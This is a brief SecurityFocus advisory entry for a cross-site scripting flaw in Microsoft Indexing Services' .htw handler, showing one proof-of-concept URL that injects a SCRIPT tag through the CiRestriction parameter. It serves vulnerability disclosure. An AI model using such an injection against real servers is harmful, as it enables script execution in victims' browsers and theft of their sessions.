info
discussion
exploit
solution
references
Microsoft Indexing Services .htw Cross-Site Scripting Vulnerability
The following example was submitted:
http://target/null.htw?CiWebHitsFile=/filename.htm&CiRestriction="<SCRIPT>Active Scripting</SCRIPT>"
Privacy Statement
Copyright 2010, SecurityFocus
